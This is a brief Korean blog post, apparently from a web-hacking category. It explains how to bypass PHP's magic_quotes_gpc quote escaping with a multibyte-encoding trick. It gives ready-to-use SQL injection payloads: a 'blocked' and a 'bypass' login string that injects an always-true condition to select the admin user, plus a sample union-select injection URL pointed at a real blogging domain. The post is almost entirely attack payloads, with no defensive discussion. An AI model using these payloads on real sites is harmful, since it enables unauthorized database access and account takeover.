PHP에서 SQL-Injection을 할때, magic_quotes_gpc 설정때문에 '입력이 안될경우 :
mb_convert_encoding 취약점 (%a1 ~ %fe 으로 magic_quotes_gpc %27 우회)
차단 : id=%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest
우회 : id=%aa%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest
예문) http://www.tistory.com/index.php?id=binaryu%aa%27/*&pw=*/union/**/select/**/3%23
'Webhacking' 카테고리의 다른 글
| [PHP2EXE] PHP Compiler/Embedder 1.21 (0) | 2013.03.04 |
|---|---|
| .htaccess Attack Sample for PHP (0) | 2013.03.04 |
| webhacking.kr 9번 문제 풀이 (1) | 2013.03.04 |
| Mysql Table Name Search (0) | 2013.03.04 |
| 아스키 코드표 (0) | 2013.02.12 |